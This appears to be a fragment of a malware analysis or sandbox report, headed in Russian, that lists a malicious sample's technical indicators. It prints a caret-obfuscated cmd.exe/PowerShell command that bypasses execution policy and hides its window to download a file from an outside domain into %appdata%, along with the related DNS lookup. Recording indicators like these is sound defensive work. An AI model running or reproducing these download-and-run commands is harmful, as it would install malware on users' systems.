Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OW^ERSHeLl.eXe^ -ExecutI^oN^POlicy B^yPaSs^ -^N^OpRoF^il^E -^W^i^n^Dow^S^t^yL^E h^idD^e^N (^nE^W^-^ob^J^ECt sY^St^em.NEt.web^Cl^i^ENt)^.doW^nlo^adfILe('http://trustgovnet.top/sea...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "p^OW^ERSHeLl.eXe^ -ExecutI^oN^POlicy B^yPaSs^ -^N^OpRoF^il^E -^W^i^n^Dow^S^t^yL^E h^idD^e^N (^nE^W^-^ob^J^ECt sY^St^em.NEt.web^Cl^i^ENt)^.doW^nlo^adfILe('http://trustgovnet.top/sea...' (со скрытым окном)